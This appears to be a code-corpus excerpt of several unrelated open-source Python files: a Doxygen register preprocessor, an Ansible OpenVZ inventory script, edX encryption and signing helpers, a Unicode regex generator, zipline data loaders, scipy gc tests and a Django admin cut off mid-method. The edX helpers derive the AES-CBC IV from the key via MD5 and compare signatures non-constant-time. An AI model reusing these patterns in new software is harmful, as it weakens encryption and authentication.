lines.append(start+"@anchor %s" %(curr.id))
lines.append(start+'<table class="register_view">')
lines.append(start+"<caption>%s</caption><tr>" % (curr.title))
begins = []
ends = []
ones = []
for item in ordered:
if item.endbit:
begins.append(int(item.bit))
ends.append(int(item.endbit))
else:
ones.append(int(item.bit))
if (len(begins)==0 or begins[0] != 31) and (len(ones)==0 or ones[0] != 31):
begins.append(31)
if (len(ends)==0 or ends[-1] != 0) and (len(ones)==0 or ones[-1] != 0):
ends.append(0)
for i in range(31, -1, -1):
if i in begins:
thclass = """ class="begin" """
elif i in ends:
thclass = """ class="end" """
elif i in ones:
thclass = """ class="bit" """
else:
thclass = None
if thclass:
lines.append(start+"<th%s>%d</th>" % (thclass, i))
else:
lines.append(start+"<th></th>")
index = 31
lines.append(start+"</tr><tr>")
for item in ordered:
bit = int(item.bit)
span = bit - (int(item.endbit or bit)-1)
offset = index - bit
if offset:
lines.append(start+"""<td colspan="%d" class="empty"> </td>""" % (offset))
index = int(item.endbit or bit) -1
lines.append(start+"""<td colspan="%d">%s</td>""" % (span, item.name))
if index != -1:
lines.append(start+"""<td colspan="%d" class="empty"> </td>""" % (index+1))
lines.append(start+"</tr></table>")
lines.append(start+'<table class="register_list">')
lines.append(start+"<caption>%s Description</caption>" % (curr.title))
lines.append(start+'<tr class="register_list_header"><th class="register_table_bits">Bits</th><th>Id</th><th>Description</th></tr>')
for item in ordered:
if item.endbit:
bits = "%s - %s" % (item.bit, item.endbit)
else:
bits = "%s" % (item.bit)
lines.append(start+"""<tr><td>%s</td><td>%s</td><td>%s</td></tr>""" % (bits, item.name, item.desc))
lines.append(start+"</table>")
# Put Table into lines
curr = None
elif res(bitfollow_ex.match(line)):
field.desc += res.group('desc').strip() + ' '
return lines
def RegisterHandler(lineArray, options):
return BlockHandler(lineArray, options,
StartDelimiter='@register',
EndDelimiter='@endregister',
Processor=ProcessRegister)
if __name__ == "__main__":
# Parse command line
from doxygen_preprocessor import CommandLineHandler
options, remainder = CommandLineHandler()
from filterprocessor import FilterFiles
FilterFiles([RegisterHandler,], options, remainder)
| agpl-3.0 |
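The `bits_ex` pattern above recognizes doc-comment lines of the form `[31:16] (NAME) description`. A minimal sketch of that parse, reusing the same regex and group names but returning a plain dict instead of the script's `Empty` objects:

```python
import re

BITS_RE = re.compile(
    r"^(?P<start>\W*(\*|///)?\W*)"
    r"\[(?P<bit>\d+)(:(?P<endbit>\d+))?\]\W*"
    r"\((?P<name>[^)]+)\)(?P<desc>.*)$")


def parse_bit_line(line):
    """Return the bit-field described by `line`, or None if it isn't one."""
    m = BITS_RE.match(line)
    if not m:
        return None
    return {
        'bit': int(m.group('bit')),
        # Single-bit fields like [0] have no endbit.
        'endbit': int(m.group('endbit')) if m.group('endbit') else None,
        'name': m.group('name'),
        'desc': m.group('desc').strip(),
    }
```

Both `*`-style and `///`-style comment leaders are accepted, matching the `start` group in the original expression.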
wenottingham/ansible | contrib/inventory/openvz.py | 86 | 2692 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# openvz.py
#
# Copyright 2014 jordonr <jordon@beamsyn.net>
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Inspired by libvirt_lxc.py inventory script
# https://github.com/ansible/ansible/blob/e5ef0eca03cbb6c8950c06dc50d0ca22aa8902f4/plugins/inventory/libvirt_lxc.py
#
# Groups are determined by the description field of openvz guests
# multiple groups can be separated by commas: webserver,dbserver
from subprocess import Popen,PIPE
import sys
import json
#List openvz hosts
vzhosts = ['vzhost1','vzhost2','vzhost3']
#Add openvz hosts to the inventory, plus the "_meta" trick
inventory = {'vzhosts': {'hosts': vzhosts}, '_meta': {'hostvars': {}}}
#default group, when description not defined
default_group = ['vzguest']
def get_guests():
#Loop through vzhosts
for h in vzhosts:
#SSH to vzhost and get the list of guests in json
pipe = Popen(['ssh', h,'vzlist','-j'], stdout=PIPE, universal_newlines=True)
#Load Json info of guests
json_data = json.loads(pipe.stdout.read())
#loop through guests
for j in json_data:
#Add information to host vars
inventory['_meta']['hostvars'][j['hostname']] = {'ctid': j['ctid'], 'veid': j['veid'], 'vpsid': j['vpsid'], 'private_path': j['private'], 'root_path': j['root'], 'ip': j['ip']}
#determine group from guest description
if j['description'] is not None:
groups = j['description'].split(",")
else:
groups = default_group
#add guest to inventory
for g in groups:
if g not in inventory:
inventory[g] = {'hosts': []}
inventory[g]['hosts'].append(j['hostname'])
return inventory
if len(sys.argv) == 2 and sys.argv[1] == '--list':
inv_json = get_guests()
print(json.dumps(inv_json, sort_keys=True))
elif len(sys.argv) == 3 and sys.argv[1] == '--host':
print(json.dumps({}))
else:
print("Need an argument, either --list or --host <host>")
| gpl-3.0 |
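The grouping step above splits a guest's description field on commas and files the host under each resulting group, falling back to a default group. A standalone sketch of that inventory-building logic with the SSH/`vzlist` call factored out — guest dicts are passed in directly, so the function below is an illustration, not the script's real interface:

```python
import json


def build_inventory(guests, default_group='vzguest'):
    """guests: iterable of dicts with 'hostname' and optional 'description'."""
    inventory = {'_meta': {'hostvars': {}}}
    for g in guests:
        # Everything except the hostname itself becomes a host variable.
        inventory['_meta']['hostvars'][g['hostname']] = {
            k: v for k, v in g.items() if k != 'hostname'}
        desc = g.get('description')
        groups = desc.split(',') if desc else [default_group]
        for group in groups:
            inventory.setdefault(group, {'hosts': []})
            inventory[group]['hosts'].append(g['hostname'])
    return inventory
```

The returned structure is JSON-serializable, matching what Ansible expects from a dynamic inventory script's `--list` output.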
kuiwei/edx-platform | lms/djangoapps/verify_student/ssencrypt.py | 183 | 7000 | """
NOTE: Anytime a `key` is passed into a function here, we assume it's a raw byte
string. It should *not* be a string representation of a hex value. In other
words, passing the `str` value of
`"32fe72aaf2abb44de9e161131b5435c8d37cbdb6f5df242ae860b283115f2dae"` is bad.
You want to pass in the result of calling .decode('hex') on that, so this instead:
"'2\xfer\xaa\xf2\xab\xb4M\xe9\xe1a\x13\x1bT5\xc8\xd3|\xbd\xb6\xf5\xdf$*\xe8`\xb2\x83\x11_-\xae'"
The RSA functions take any key format that RSA.importKey() accepts, so...
An RSA public key can be in any of the following formats:
* X.509 subjectPublicKeyInfo DER SEQUENCE (binary or PEM encoding)
* PKCS#1 RSAPublicKey DER SEQUENCE (binary or PEM encoding)
* OpenSSH (textual public key only)
An RSA private key can be in any of the following formats:
* PKCS#1 RSAPrivateKey DER SEQUENCE (binary or PEM encoding)
* PKCS#8 PrivateKeyInfo DER SEQUENCE (binary or PEM encoding)
* OpenSSH (textual public key only)
In case of PEM encoding, the private key can be encrypted with DES or 3TDES
according to a certain pass phrase. Only OpenSSL-compatible pass phrases are
supported.
"""
from hashlib import md5, sha256
import base64
import binascii
import hmac
import logging
from Crypto import Random
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
log = logging.getLogger(__name__)
def encrypt_and_encode(data, key):
""" Encrypt `data` with AES using `key`, then base64-encode the result """
return base64.urlsafe_b64encode(aes_encrypt(data, key))
def decode_and_decrypt(encoded_data, key):
""" Base64-decode `encoded_data`, then decrypt it with AES using `key` """
return aes_decrypt(base64.urlsafe_b64decode(encoded_data), key)
def aes_encrypt(data, key):
"""
Return a version of `data` that has been AES-encrypted with `key`.
"""
cipher = aes_cipher_from_key(key)
padded_data = pad(data)
return cipher.encrypt(padded_data)
def aes_decrypt(encrypted_data, key):
"""
Decrypt `encrypted_data` using `key`
"""
cipher = aes_cipher_from_key(key)
padded_data = cipher.decrypt(encrypted_data)
return unpad(padded_data)
def aes_cipher_from_key(key):
"""
Given an AES key, return a Cipher object that has `encrypt()` and
`decrypt()` methods. It will create the cipher to use CBC mode, and create
the initialization vector as Software Secure expects it.
"""
return AES.new(key, AES.MODE_CBC, generate_aes_iv(key))
def generate_aes_iv(key):
"""
Return the initialization vector Software Secure expects for a given AES
key (they hash it a couple of times and take a substring).
"""
return md5(key + md5(key).hexdigest()).hexdigest()[:AES.block_size]
def random_aes_key():
return Random.new().read(32)
def pad(data):
""" Pad the given `data` such that it fits into the proper AES block size """
bytes_to_pad = AES.block_size - len(data) % AES.block_size
return data + (bytes_to_pad * chr(bytes_to_pad))
def unpad(padded_data):
""" Remove all padding from `padded_data` """
num_padded_bytes = ord(padded_data[-1])
return padded_data[:-num_padded_bytes]
def rsa_encrypt(data, rsa_pub_key_str):
"""
`rsa_pub_key` is a string with the public key
"""
key = RSA.importKey(rsa_pub_key_str)
cipher = PKCS1_OAEP.new(key)
encrypted_data = cipher.encrypt(data)
return encrypted_data
def rsa_decrypt(data, rsa_priv_key_str):
"""
When given some `data` and an RSA private key, decrypt the data
"""
key = RSA.importKey(rsa_priv_key_str)
cipher = PKCS1_OAEP.new(key)
return cipher.decrypt(data)
def has_valid_signature(method, headers_dict, body_dict, access_key, secret_key):
"""
Given a message (either request or response), say whether it has a valid
signature or not.
"""
_, expected_signature, _ = generate_signed_message(
method, headers_dict, body_dict, access_key, secret_key
)
authorization = headers_dict["Authorization"]
auth_token, post_signature = authorization.split(":")
_, post_access_key = auth_token.split()
if post_access_key != access_key:
log.error("Posted access key does not match ours")
log.debug("Their access: %s; Our access: %s", post_access_key, access_key)
return False
if post_signature != expected_signature:
log.error("Posted signature does not match expected")
log.debug("Their sig: %s; Expected: %s", post_signature, expected_signature)
return False
return True
def generate_signed_message(method, headers_dict, body_dict, access_key, secret_key):
"""
Returns a (message, signature) pair.
"""
message = signing_format_message(method, headers_dict, body_dict)
# hmac needs a byte string for its key; it can't be unicode.
hashed = hmac.new(secret_key.encode('utf-8'), message, sha256)
signature = binascii.b2a_base64(hashed.digest()).rstrip('\n')
authorization_header = "SSI {}:{}".format(access_key, signature)
message += '\n'
return message, signature, authorization_header
def signing_format_message(method, headers_dict, body_dict):
"""
Given a dictionary of headers and a dictionary of the JSON for the body,
will return a str that represents the normalized version of this message
that will be used to generate a signature.
"""
headers_str = "{}\n\n{}".format(method, header_string(headers_dict))
body_str = body_string(body_dict)
message = headers_str + body_str
return message
def header_string(headers_dict):
"""Given a dictionary of headers, return a canonical string representation."""
header_list = []
if 'Content-Type' in headers_dict:
header_list.append(headers_dict['Content-Type'] + "\n")
if 'Date' in headers_dict:
header_list.append(headers_dict['Date'] + "\n")
if 'Content-MD5' in headers_dict:
header_list.append(headers_dict['Content-MD5'] + "\n")
return "".join(header_list) # Note that trailing \n's are important
def body_string(body_dict, prefix=""):
"""
Return a canonical string representation of the body of a JSON request or
response. This canonical representation will be used as an input to the
hashing used to generate a signature.
"""
body_list = []
for key, value in sorted(body_dict.items()):
if isinstance(value, (list, tuple)):
for i, arr in enumerate(value):
if isinstance(arr, dict):
body_list.append(body_string(arr, u"{}.{}.".format(key, i)))
else:
body_list.append(u"{}.{}:{}\n".format(key, i, arr).encode('utf-8'))
elif isinstance(value, dict):
body_list.append(body_string(value, key + ":"))
else:
if value is None:
value = "null"
body_list.append(u"{}{}:{}\n".format(prefix, key, value).encode('utf-8'))
return "".join(body_list) # Note that trailing \n's are important
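A minimal standalone sketch of the signing step above (the key and message here are illustrative placeholders, not values from the real service; the real message comes from signing_format_message()):

```python
import binascii
import hmac
from hashlib import sha256

# Hypothetical inputs for illustration only.
secret_key = u"secret"
message = "POST\n\napplication/json\n"

# hmac needs byte strings for both the key and the message.
hashed = hmac.new(secret_key.encode('utf-8'), message.encode('utf-8'), sha256)
signature = binascii.b2a_base64(hashed.digest()).decode('ascii').rstrip('\n')
print(signature)  # 44 base64 characters for a 32-byte SHA-256 digest
```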
| agpl-3.0 |
dxuehu/cartero | test/example2/node_modules/browserify-shim/node_modules/rename-function-calls/node_modules/detective/node_modules/esprima-six/tools/generate-unicode-regex.py | 341 | 5096 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# By Yusuke Suzuki <utatane.tea@gmail.com>
# Modified by Mathias Bynens <http://mathiasbynens.be/>
# http://code.google.com/p/esprima/issues/detail?id=110
import sys
import string
import re
class RegExpGenerator(object):
def __init__(self, detector):
self.detector = detector
def generate_identifier_start(self):
r = [ ch for ch in range(0xFFFF + 1) if self.detector.is_identifier_start(ch)]
return self._generate_range(r)
def generate_identifier_part(self):
r = [ ch for ch in range(0xFFFF + 1) if self.detector.is_identifier_part(ch)]
return self._generate_range(r)
def generate_non_ascii_identifier_start(self):
r = [ ch for ch in range(0x0080, 0xFFFF + 1) if self.detector.is_identifier_start(ch)]
return self._generate_range(r)
def generate_non_ascii_identifier_part(self):
r = [ ch for ch in range(0x0080, 0xFFFF + 1) if self.detector.is_identifier_part(ch)]
return self._generate_range(r)
def generate_non_ascii_separator_space(self):
r = [ ch for ch in range(0x0080, 0xFFFF + 1) if self.detector.is_separator_space(ch)]
return self._generate_range(r)
def _generate_range(self, r):
if len(r) == 0:
return '[]'
buf = []
start = r[0]
end = r[0]
predict = start + 1
r = r[1:]
for code in r:
if predict == code:
end = code
predict = code + 1
continue
else:
if start == end:
buf.append("\\u%04X" % start)
elif end == start + 1:
buf.append("\\u%04X\\u%04X" % (start, end))
else:
buf.append("\\u%04X-\\u%04X" % (start, end))
start = code
end = code
predict = code + 1
if start == end:
buf.append("\\u%04X" % start)
else:
buf.append("\\u%04X-\\u%04X" % (start, end))
return '[' + ''.join(buf) + ']'
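The range-compression loop above can be sketched as a standalone function (a simplified rewrite for illustration, not the module's own code; unlike the original it also collapses two-element runs into a range):

```python
def compress_ranges(codepoints):
    """Collapse a sorted list of code points into a regex character class."""
    if not codepoints:
        return '[]'
    buf = []
    start = end = codepoints[0]
    for code in codepoints[1:]:
        if code == end + 1:      # still contiguous; extend the current run
            end = code
            continue
        # flush the finished run, then start a new one
        buf.append("\\u%04X" % start if start == end
                   else "\\u%04X-\\u%04X" % (start, end))
        start = end = code
    buf.append("\\u%04X" % start if start == end
               else "\\u%04X-\\u%04X" % (start, end))
    return '[' + ''.join(buf) + ']'

print(compress_ranges([0x41, 0x42, 0x43, 0x61]))  # → [\u0041-\u0043\u0061]
```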
class Detector(object):
def __init__(self, data):
self.data = data
def is_ascii(self, ch):
return ch < 0x80
def is_ascii_alpha(self, ch):
v = ch | 0x20
return v >= ord('a') and v <= ord('z')
def is_decimal_digit(self, ch):
return ch >= ord('0') and ch <= ord('9')
def is_octal_digit(self, ch):
return ch >= ord('0') and ch <= ord('7')
def is_hex_digit(self, ch):
v = ch | 0x20
return self.is_decimal_digit(ch) or (v >= ord('a') and v <= ord('f'))
def is_digit(self, ch):
return self.is_decimal_digit(ch) or self.data[ch] == 'Nd'
def is_ascii_alphanumeric(self, ch):
return self.is_decimal_digit(ch) or self.is_ascii_alpha(ch)
def _is_non_ascii_identifier_start(self, ch):
c = self.data[ch]
return c == 'Lu' or c == 'Ll' or c == 'Lt' or c == 'Lm' or c == 'Lo' or c == 'Nl'
def _is_non_ascii_identifier_part(self, ch):
c = self.data[ch]
return c == 'Lu' or c == 'Ll' or c == 'Lt' or c == 'Lm' or c == 'Lo' or c == 'Nl' or c == 'Mn' or c == 'Mc' or c == 'Nd' or c == 'Pc' or ch == 0x200C or ch == 0x200D
def is_separator_space(self, ch):
return self.data[ch] == 'Zs'
def is_white_space(self, ch):
return ch == ord(' ') or ch == ord("\t") or ch == 0xB or ch == 0xC or ch == 0x00A0 or ch == 0xFEFF or self.is_separator_space(ch)
def is_line_terminator(self, ch):
return ch == 0x000D or ch == 0x000A or self.is_line_or_paragraph_terminator(ch)
def is_line_or_paragraph_terminator(self, ch):
return ch == 0x2028 or ch == 0x2029
def is_identifier_start(self, ch):
if self.is_ascii(ch):
return ch == ord('$') or ch == ord('_') or ch == ord('\\') or self.is_ascii_alpha(ch)
return self._is_non_ascii_identifier_start(ch)
def is_identifier_part(self, ch):
if self.is_ascii(ch):
return ch == ord('$') or ch == ord('_') or ch == ord('\\') or self.is_ascii_alphanumeric(ch)
return self._is_non_ascii_identifier_part(ch)
def analyze(source):
data = []
dictionary = {}
with open(source) as uni:
flag = False
first = 0
for line in uni:
d = string.split(line.strip(), ";")
val = int(d[0], 16)
if flag:
if re.compile("<.+, Last>").match(d[1]):
# print "%s : u%X" % (d[1], val)
flag = False
for t in range(first, val+1):
dictionary[t] = str(d[2])
else:
raise Exception("Database Exception")
else:
if re.compile("<.+, First>").match(d[1]):
# print "%s : u%X" % (d[1], val)
flag = True
first = val
else:
dictionary[val] = str(d[2])
for i in range(0xFFFF + 1):
if dictionary.get(i) == None:
data.append("Un")
else:
data.append(dictionary[i])
return RegExpGenerator(Detector(data))
def main(source):
generator = analyze(source)
print generator.generate_non_ascii_identifier_start()
print generator.generate_non_ascii_identifier_part()
print generator.generate_non_ascii_separator_space()
if __name__ == '__main__':
main(sys.argv[1])
| mit |
umuzungu/zipline | zipline/data/us_equity_loader.py | 3 | 11226 | # Copyright 2016 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import (
ABCMeta,
abstractmethod,
abstractproperty,
)
from cachetools import LRUCache
from numpy import around, hstack
from pandas.tslib import normalize_date
from six import with_metaclass
from zipline.lib._float64window import AdjustedArrayWindow as Float64Window
from zipline.lib.adjustment import Float64Multiply
from zipline.utils.cache import ExpiringCache
from zipline.utils.memoize import lazyval
from zipline.utils.numpy_utils import float64_dtype
class SlidingWindow(object):
"""
Wrapper around an AdjustedArrayWindow which supports monotonically
increasing (by datetime) requests for a sized window of data.
Parameters
----------
window : AdjustedArrayWindow
Window of pricing data with prefetched values beyond the current
simulation dt.
cal_start : int
Index in the overall calendar at which the window starts.
"""
def __init__(self, window, size, cal_start, offset):
self.window = window
self.cal_start = cal_start
self.current = around(next(window), 3)
self.offset = offset
self.most_recent_ix = self.cal_start + size
def get(self, end_ix):
"""
Returns
-------
out : A np.ndarray of the equity pricing up to end_ix after adjustments
and rounding have been applied.
"""
if self.most_recent_ix == end_ix:
return self.current
target = end_ix - self.cal_start - self.offset + 1
self.current = around(self.window.seek(target), 3)
self.most_recent_ix = end_ix
return self.current
class USEquityHistoryLoader(with_metaclass(ABCMeta)):
"""
Loader for sliding history windows of adjusted US Equity Pricing data.
Parameters
----------
reader : DailyBarReader, MinuteBarReader
Reader for pricing bars.
adjustment_reader : SQLiteAdjustmentReader
Reader for adjustment data.
"""
FIELDS = ('open', 'high', 'low', 'close', 'volume')
def __init__(self, env, reader, adjustment_reader, sid_cache_size=1000):
self.env = env
self._reader = reader
self._adjustments_reader = adjustment_reader
self._window_blocks = {
field: ExpiringCache(LRUCache(maxsize=sid_cache_size))
for field in self.FIELDS
}
@abstractproperty
def _prefetch_length(self):
pass
@abstractproperty
def _calendar(self):
pass
@abstractmethod
def _array(self, start, end, assets, field):
pass
def _get_adjustments_in_range(self, asset, dts, field):
"""
Get the Float64Multiply objects to pass to an AdjustedArrayWindow.
For the use of AdjustedArrayWindow in the loader, which looks back
from current simulation time back to a window of data the dictionary is
structured with:
- the key into the dictionary for adjustments is the location of the
day from which the window is being viewed.
- the start of all multiply objects is always 0 (in each window all
adjustments are overlapping)
- the end of the multiply object is the location before the calendar
location of the adjustment action, making all days before the event
adjusted.
Parameters
----------
asset : Asset
The assets for which to get adjustments.
dts : iterable of datetime64-like
The days for which adjustment data is needed.
field : str
OHLCV field for which to get the adjustments.
Returns
-------
out : The adjustments as a dict of loc -> Float64Multiply
"""
sid = int(asset)
start = normalize_date(dts[0])
end = normalize_date(dts[-1])
adjs = {}
if field != 'volume':
mergers = self._adjustments_reader.get_adjustments_for_sid(
'mergers', sid)
for m in mergers:
dt = m[0]
if start < dt <= end:
end_loc = dts.searchsorted(dt)
mult = Float64Multiply(0,
end_loc - 1,
0,
0,
m[1])
try:
adjs[end_loc].append(mult)
except KeyError:
adjs[end_loc] = [mult]
divs = self._adjustments_reader.get_adjustments_for_sid(
'dividends', sid)
for d in divs:
dt = d[0]
if start < dt <= end:
end_loc = dts.searchsorted(dt)
mult = Float64Multiply(0,
end_loc - 1,
0,
0,
d[1])
try:
adjs[end_loc].append(mult)
except KeyError:
adjs[end_loc] = [mult]
splits = self._adjustments_reader.get_adjustments_for_sid(
'splits', sid)
for s in splits:
dt = s[0]
if field == 'volume':
ratio = 1.0 / s[1]
else:
ratio = s[1]
if start < dt <= end:
end_loc = dts.searchsorted(dt)
mult = Float64Multiply(0,
end_loc - 1,
0,
0,
ratio)
try:
adjs[end_loc].append(mult)
except KeyError:
adjs[end_loc] = [mult]
return adjs
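The loc-keyed structure described in the docstring above can be illustrated standalone (the dates and ratio are made up; `bisect_left` stands in for the calendar index's `searchsorted`, and plain tuples stand in for `Float64Multiply` objects):

```python
from bisect import bisect_left

# A 2:1 split dated 2016-01-06 inside a three-day calendar window.
dts = ['2016-01-04', '2016-01-05', '2016-01-06']
split_dt = '2016-01-06'

# The key is the calendar location of the event; the multiply spans
# rows 0 .. end_loc - 1, i.e. every day *before* the event.
end_loc = bisect_left(dts, split_dt)
adjs = {end_loc: [(0, end_loc - 1, 0.5)]}  # (first_row, last_row, ratio)
print(adjs)  # → {2: [(0, 1, 0.5)]}
```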
def _ensure_sliding_windows(self, assets, dts, field):
"""
Ensure that there is a sliding window for each asset that can
provide data for the given parameters.
If the corresponding window for the (assets, len(dts), field) does not
exist, then create a new one.
If a corresponding window does exist for (assets, len(dts), field), but
can not provide data for the current dts range, then create a new
one and replace the expired window.
Parameters
----------
assets : iterable of Assets
The assets in the window
dts : iterable of datetime64-like
The datetimes for which to fetch data.
Assumes that all dts are present and contiguous in the calendar.
field : str
The OHLCV field for which to retrieve data.
Returns
-------
out : list of SlidingWindow with sufficient data so that each asset's
window can provide `get` for the index corresponding with the last
value in `dts`
"""
end = dts[-1]
size = len(dts)
asset_windows = {}
needed_assets = []
for asset in assets:
try:
asset_windows[asset] = self._window_blocks[field].get(
(asset, size), end)
except KeyError:
needed_assets.append(asset)
if needed_assets:
start = dts[0]
offset = 0
start_ix = self._calendar.get_loc(start)
end_ix = self._calendar.get_loc(end)
cal = self._calendar
prefetch_end_ix = min(end_ix + self._prefetch_length, len(cal) - 1)
prefetch_end = cal[prefetch_end_ix]
prefetch_dts = cal[start_ix:prefetch_end_ix + 1]
prefetch_len = len(prefetch_dts)
array = self._array(prefetch_dts, needed_assets, field)
view_kwargs = {}
if field == 'volume':
array = array.astype(float64_dtype)
for i, asset in enumerate(needed_assets):
if self._adjustments_reader:
adjs = self._get_adjustments_in_range(
asset, prefetch_dts, field)
else:
adjs = {}
window = Float64Window(
array[:, i].reshape(prefetch_len, 1),
view_kwargs,
adjs,
offset,
size
)
sliding_window = SlidingWindow(window, size, start_ix, offset)
asset_windows[asset] = sliding_window
self._window_blocks[field].set((asset, size),
sliding_window,
prefetch_end)
return [asset_windows[asset] for asset in assets]
def history(self, assets, dts, field):
"""
A window of pricing data with adjustments applied assuming that the
end of the window is the day before the current simulation time.
Parameters
----------
assets : iterable of Assets
The assets in the window.
dts : iterable of datetime64-like
The datetimes for which to fetch data.
Assumes that all dts are present and contiguous in the calendar.
field : str
The OHLCV field for which to retrieve data.
Returns
-------
out : np.ndarray with shape(len(days between start, end), len(assets))
"""
block = self._ensure_sliding_windows(assets, dts, field)
end_ix = self._calendar.get_loc(dts[-1])
return hstack([window.get(end_ix) for window in block])
class USEquityDailyHistoryLoader(USEquityHistoryLoader):
@property
def _prefetch_length(self):
return 40
@property
def _calendar(self):
return self._reader._calendar
def _array(self, dts, assets, field):
return self._reader.load_raw_arrays(
[field],
dts[0],
dts[-1],
assets,
)[0]
class USEquityMinuteHistoryLoader(USEquityHistoryLoader):
@property
def _prefetch_length(self):
return 1560
@lazyval
def _calendar(self):
mm = self.env.market_minutes
return mm[mm.slice_indexer(start=self._reader.first_trading_day,
end=self._reader.last_available_dt)]
def _array(self, dts, assets, field):
return self._reader.load_raw_arrays(
[field],
dts[0],
dts[-1],
assets,
)[0]
| apache-2.0 |
futurulus/scipy | scipy/_lib/tests/test__gcutils.py | 109 | 2804 | """ Test for assert_deallocated context manager and gc utilities
"""
import gc
from scipy._lib._gcutils import set_gc_state, gc_state, assert_deallocated, ReferenceError
from nose.tools import assert_equal, raises
def test_set_gc_state():
gc_status = gc.isenabled()
try:
for state in (True, False):
gc.enable()
set_gc_state(state)
assert_equal(gc.isenabled(), state)
gc.disable()
set_gc_state(state)
assert_equal(gc.isenabled(), state)
finally:
if gc_status:
gc.enable()
def test_gc_state():
# Test gc_state context manager
gc_status = gc.isenabled()
try:
for pre_state in (True, False):
set_gc_state(pre_state)
for with_state in (True, False):
# Check the gc state is with_state in with block
with gc_state(with_state):
assert_equal(gc.isenabled(), with_state)
# And returns to previous state outside block
assert_equal(gc.isenabled(), pre_state)
# Even if the gc state is set explicitly within the block
with gc_state(with_state):
assert_equal(gc.isenabled(), with_state)
set_gc_state(not with_state)
assert_equal(gc.isenabled(), pre_state)
finally:
if gc_status:
gc.enable()
def test_assert_deallocated():
# Ordinary use
class C(object):
def __init__(self, arg0, arg1, name='myname'):
self.name = name
for gc_current in (True, False):
with gc_state(gc_current):
# We are deleting from with-block context, so that's OK
with assert_deallocated(C, 0, 2, 'another name') as c:
assert_equal(c.name, 'another name')
del c
# Or not using the thing in with-block context, also OK
with assert_deallocated(C, 0, 2, name='third name'):
pass
assert_equal(gc.isenabled(), gc_current)
@raises(ReferenceError)
def test_assert_deallocated_nodel():
class C(object):
pass
# Need to delete after using if in with-block context
with assert_deallocated(C) as c:
pass
@raises(ReferenceError)
def test_assert_deallocated_circular():
class C(object):
def __init__(self):
self._circular = self
# Circular reference, no automatic garbage collection
with assert_deallocated(C) as c:
del c
@raises(ReferenceError)
def test_assert_deallocated_circular2():
class C(object):
def __init__(self):
self._circular = self
# Still circular reference, no automatic garbage collection
with assert_deallocated(C):
pass
| bsd-3-clause |
mythmon/wok | wok/util.py | 11 | 1471 | import re
from unicodedata import normalize
from datetime import date, time, datetime, timedelta
def chunk(li, n):
"""Yield successive n-size chunks from li."""
for i in xrange(0, len(li), n):
yield li[i:i+n]
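A Python 3 sketch of the helper above (`range` replaces the Python 2 `xrange`):

```python
def chunk(li, n):
    """Yield successive n-size chunks from li."""
    for i in range(0, len(li), n):
        yield li[i:i + n]

print(list(chunk([1, 2, 3, 4, 5], 2)))  # → [[1, 2], [3, 4], [5]]
```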
def date_and_times(meta):
date_part = None
time_part = None
if 'date' in meta:
date_part = meta['date']
if 'time' in meta:
time_part = meta['time']
if 'datetime' in meta:
if date_part is None:
if isinstance(meta['datetime'], datetime):
date_part = meta['datetime'].date()
elif isinstance(meta['datetime'], date):
date_part = meta['datetime']
if time_part is None and isinstance(meta['datetime'], datetime):
time_part = meta['datetime'].time()
if isinstance(time_part, int):
seconds = time_part % 60
minutes = (time_part / 60) % 60
hours = (time_part / 3600)
time_part = time(hours, minutes, seconds)
meta['date'] = date_part
meta['time'] = time_part
if date_part is not None and time_part is not None:
meta['datetime'] = datetime(date_part.year, date_part.month,
date_part.day, time_part.hour, time_part.minute,
time_part.second, time_part.microsecond, time_part.tzinfo)
elif date_part is not None:
meta['datetime'] = datetime(date_part.year, date_part.month, date_part.day)
else:
meta['datetime'] = None
| mit |
akrzos/cfme_tests | sprout/appliances/admin.py | 2 | 7301 | # -*- coding: utf-8 -*-
from functools import wraps
from celery import chain
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.db.models.query import QuerySet
from django_object_actions import DjangoObjectActions
# Register your models here.
from appliances.models import (
Provider, Template, Appliance, Group, AppliancePool, DelayedProvisionTask,
MismatchVersionMailer, UserApplianceQuota, User, BugQuery)
from appliances import tasks
from sprout.log import create_logger
def action(label, short_description):
"""Shortcut for actions"""
def g(f):
@wraps(f)
def processed_action(self, request, objects):
if not isinstance(objects, QuerySet):
objects = [objects]
return f(self, request, objects)
processed_action.label = label
processed_action.short_description = short_description
return processed_action
return g
def register_for(model, reregister=False):
def f(modeladmin):
if reregister:
admin.site.unregister(model)
admin.site.register(model, modeladmin)
return modeladmin
return f
class Admin(DjangoObjectActions, admin.ModelAdmin):
@property
def logger(self):
return create_logger(self)
@register_for(DelayedProvisionTask)
class DelayedProvisionTaskAdmin(Admin):
pass
@register_for(Appliance)
class ApplianceAdmin(Admin):
objectactions = ["power_off", "power_on", "suspend", "kill"]
actions = objectactions
list_display = [
"name", "owner", "template", "appliance_pool", "ready", "show_ip_address", "power_state"]
readonly_fields = ["owner"]
@action("Power off", "Power off selected appliance")
def power_off(self, request, appliances):
for appliance in appliances:
tasks.appliance_power_off.delay(appliance.id)
self.message_user(request, "Initiated poweroff of {}.".format(appliance.name))
self.logger.info(
"User {}/{} requested poweroff of appliance {}".format(
request.user.pk, request.user.username, appliance.id))
@action("Power on", "Power on selected appliance")
def power_on(self, request, appliances):
for appliance in appliances:
task_list = [tasks.appliance_power_on.si(appliance.id)]
if appliance.preconfigured:
task_list.append(tasks.wait_appliance_ready.si(appliance.id))
else:
task_list.append(tasks.mark_appliance_ready.si(appliance.id))
chain(*task_list)()
self.message_user(request, "Initiated poweron of {}.".format(appliance.name))
self.logger.info(
"User {}/{} requested poweron of appliance {}".format(
request.user.pk, request.user.username, appliance.id))
@action("Suspend", "Suspend selected appliance")
def suspend(self, request, appliances):
